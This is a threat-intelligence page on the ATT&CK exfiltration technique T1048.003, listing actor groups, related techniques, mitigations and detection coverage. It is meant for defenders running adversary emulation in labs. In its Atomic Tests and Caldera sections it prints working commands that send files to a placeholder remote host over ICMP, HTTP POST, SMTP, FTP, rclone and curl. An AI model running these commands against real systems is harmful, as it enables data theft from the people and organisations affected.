Home/ATT&CK Technique/Exfiltration Over Unencrypted Non-C2 Protocol
ATT&CK Technique

Exfiltration Over Unencrypted Non-C2 Protocol

T1048.003 · exfiltration

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS).

This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.

ESXiLinuxmacOSNetwork DevicesWindows

Actors Using This

14
north_koreaAndariel
unknown_likely_russia_alignedAnubis Ransomware
chinaAPT10
chinaAPT1
chinaAPT31
iranAPT33
iranOilRig
iranAPT35
north_koreaAPT37
north_koreaAPT38
iranAPT39
chinaAPT40
chinaAPT41
unknown_likely_russia_aligned_eldorado_lineageBlackLock Ransomware

Likely Attack Path

Techniques the same actors pair with this one distinctively - those showing up among actors who use this technique noticeably more than across all actors (lift > 1.15), grouped by kill-chain phase. The × is that lift multiplier; the shared-actor count is in the tooltip. A near-universal technique pairs with everything at baseline, so its list is short by design.
reconnaissance earlier
T1589.002 · Email Addresses ×4.26T1589 · Gather Victim Identity Information ×3.92
resource-development earlier
T1584.006 · Web Services ×3.97
execution earlier
T1559.002 · Dynamic Data Exchange ×4.00
persistence earlier
T1137.006 · Add-ins ×4.67
privilege-escalation earlier
T1546.001 · Change Default File Association ×4.67T1546.011 · Application Shimming ×4.67T1546.015 · Component Object Model Hijacking ×4.20
credential-access earlier
T1555.004 · Windows Credential Manager ×4.08
discovery earlier
T1049 · System Network Connections Discovery ×4.12
collection earlier
T1560.002 · Archive via Library ×4.67T1213.006 · Databases ×4.67
command-and-control earlier
T1008 · Fallback Channels ×4.67T1104 · Multi-Stage Channels ×4.67T1219 · Remote Access Tools ×3.98

Atomic Tests

8
Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.
manualmacos, linuxExfiltration Over Alternative Protocol - HTTP
A firewall rule (ipfw,pf,iptables or firewalld) will be needed to allow exfiltration on port 1337. Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.
powershellwindowsExfiltration Over Alternative Protocol - ICMP
Exfiltration of specified file over ICMP protocol. Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout. 
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
manuallinuxExfiltration Over Alternative Protocol - DNS
Exfiltration of specified file over DNS protocol.
powershellwindowsExfiltration Over Alternative Protocol - HTTP
Exfiltration of specified file over HTTP. Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. 
$content = Get-Content #{input_file}
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
powershellwindowsExfiltration Over Alternative Protocol - SMTP
Exfiltration of specified file over SMTP. Upon successful execution, powershell will send an email with attached file to exfiltrate to a remote address. Results will be via stdout. 
Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
powershellwindowsMAZE FTP Upload
This test simulates MAZE's ransomware's ability to exfiltrate data via FTP. Upon successful execution, all 7z files within the %windir%\temp directory will be uploaded to a remote FTP server. Reference: https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents 
$Dir_to_copy = "$env:windir\temp"
$ftp = "ftp://#{ftp_server}/"
$web_client = New-Object System.Net.WebClient
$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')
if (test-connection -count 1 -computername "#{ftp_server}" -quiet)
{foreach($file in (dir $Dir_to_copy "*.7z"))
{echo "Uploading $file..."
$uri = New-Object System.Uri($ftp+$file.name)
$web_client.UploadFile($uri, $file.FullName)}}
else
{echo "FTP Server Unreachable. Please verify the server address in input args and try again."}
powershellelevatedwindowsExfiltration Over Alternative Protocol - FTP - Rclone
Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server. [Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
shlinuxPython3 http.server
An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3 is available and if so, creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable. 
[ "$(uname)" = 'FreeBSD' ] && alias python3=python3.9
if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi

Mitigations

4
MITRE ATT&CK mitigations - vendor-agnostic guidance for reducing exposure to this technique.
M1030Network Segmentation

Network segmentation involves dividing a network into smaller, isolated segments to control and limit the flow of traffic between devices, systems, and applications. By segmenting networks, organizations can reduce the attack surface, restrict lateral movement by adversaries, and protect critical assets from compromise. Effective network segmentation leverages a combination of physical boundaries, logical separation through VLANs, and access control policies enforced by network appliances like firewalls, routers, and cloud-based configurations.

Segment Critical Systems
  • Identify and group systems based on their function, sensitivity, and risk. Examples include payment systems, HR databases, production systems, and internet-facing servers.
  • Use VLANs, firewalls, or routers to enforce logical separation.
Implement DMZ for Public-Facing Services
  • Host web servers, DNS servers, and email servers in a DMZ to limit their access to internal systems.
  • Apply strict firewall rules to filter traffic between the DMZ and internal networks.
Use Cloud-Based Segmentation
  • In cloud environments, use VPCs, subnets, and security groups to isolate applications and enforce traffic rules.
  • Apply AWS Transit Gateway or Azure VNet peering for controlled connectivity between cloud segments.
Apply Microsegmentation for Workloads
  • Use software-defined networking (SDN) tools to implement workload-level segmentation and prevent lateral movement.
Restrict Traffic with ACLs and Firewalls
  • Apply Access Control Lists (ACLs) to network devices to enforce "deny by default" policies.
  • Use firewalls to restrict both north-south (external-internal) and east-west (internal-internal) traffic.
Monitor and Audit Segmented Networks
  • Regularly review firewall rules, ACLs, and segmentation policies.
  • Monitor network flows for anomalies to ensure segmentation is effective.
Test Segmentation Effectiveness
  • Perform periodic penetration tests to verify that unauthorized access is blocked between network segments.
M1031Network Intrusion Prevention

Use intrusion detection signatures to block traffic at network boundaries.

M1037Filter Network Traffic

Employ network appliances and endpoint software to filter ingress, egress, and lateral network traffic. This includes protocol-based filtering, enforcing firewall rules, and blocking or restricting traffic based on predefined conditions to limit adversary movement and data exfiltration.

Ingress Traffic Filtering
  • Use Case: Configure network firewalls to allow traffic only from authorized IP addresses to public-facing servers.
  • Implementation: Limit SSH (port 22) and RDP (port 3389) traffic to specific IP ranges.
Egress Traffic Filtering
  • Use Case: Use firewalls or endpoint security software to block unauthorized outbound traffic to prevent data exfiltration and command-and-control (C2) communications.
  • Implementation: Block outbound traffic to known malicious IPs or regions where communication is unexpected.
Protocol-Based Filtering
  • Use Case: Restrict the use of specific protocols that are commonly abused by adversaries, such as SMB, RPC, or Telnet, based on business needs.
  • Implementation: Disable SMBv1 on endpoints to prevent exploits like EternalBlue.
Network Segmentation
  • Use Case: Create network segments for critical systems and restrict communication between segments unless explicitly authorized.
  • Implementation: Implement VLANs to isolate IoT devices or guest networks from core business systems.
Application Layer Filtering
  • Use Case: Use proxy servers or Web Application Firewalls (WAFs) to inspect and block malicious HTTP/S traffic.
  • Implementation: Configure a WAF to block SQL injection attempts or other web application exploitation techniques.
M1057Data Loss Prevention

Data Loss Prevention (DLP) involves implementing strategies and technologies to identify, categorize, monitor, and control the movement of sensitive data within an organization. This includes protecting data formats indicative of Personally Identifiable Information (PII), intellectual property, or financial data from unauthorized access, transmission, or exfiltration. DLP solutions integrate with network, endpoint, and cloud platforms to enforce security policies and prevent accidental or malicious data leaks.

Sensitive Data Categorization
  • Use Case: Identify and classify data based on sensitivity (e.g., PII, financial data, trade secrets).
  • Implementation: Use DLP solutions to scan and tag files containing sensitive information using predefined patterns, such as Social Security Numbers or credit card details.
Exfiltration Restrictions
  • Use Case: Prevent unauthorized transmission of sensitive data.
  • Implementation: Enforce policies to block unapproved email attachments, unauthorized USB usage, or unencrypted data uploads to cloud storage.
Data-in-Transit Monitoring
  • Use Case: Detect and prevent the transmission of sensitive data over unapproved channels.
  • Implementation: Deploy network-based DLP tools to inspect outbound traffic for sensitive content (e.g., financial records or PII) and block unapproved transmissions.
Endpoint Data Protection
  • Use Case: Monitor and control sensitive data usage on endpoints.
  • Implementation: Use endpoint-based DLP agents to block copy-paste actions of sensitive data and unauthorized printing or file sharing.
Cloud Data Security
  • Use Case: Protect data stored in cloud platforms.
  • Implementation: Integrate DLP with cloud storage platforms like Google Drive, OneDrive, or AWS to monitor and restrict sensitive data sharing or downloads.

Detection Coverage

1/6 layers
Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).
Behavioral / log (Sigma) 8
Analytics (MITRE CAR) none
Runtime / container (Falco) none
File / malware (YARA) none
Network (Suricata/Snort) none
Vuln scan (Nuclei) none

Caldera Emulation

1
MITRE Caldera abilities that emulate this technique - each is an executable action for automated adversary emulation.
exfiltrationlinux, windowsExfil Compressed Archive to FTP Server
LocalFile='#{host.dir.compress}';
RemoteName="$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)";
curl -T #{host.dir.compress} ftp://#{ftp.server.address}/$RemoteName --user #{ftp.user.name}:'#{ftp.user.password}'

Comply & Defend

NIST 800-53AC-02, AC-03, AC-04, AC-06, AC-16, AC-20, AC-23, CA-03, CA-07, CM-02, CM-06, CM-07, SA-08, SA-09, SC-07, SC-13, SC-28, SC-31, SI-03, SI-04, SI-10, SI-15, SR-04
D3FEND11 defensive techniques
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE ATT&CKAtomic Red Teamcar (MITRE)
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin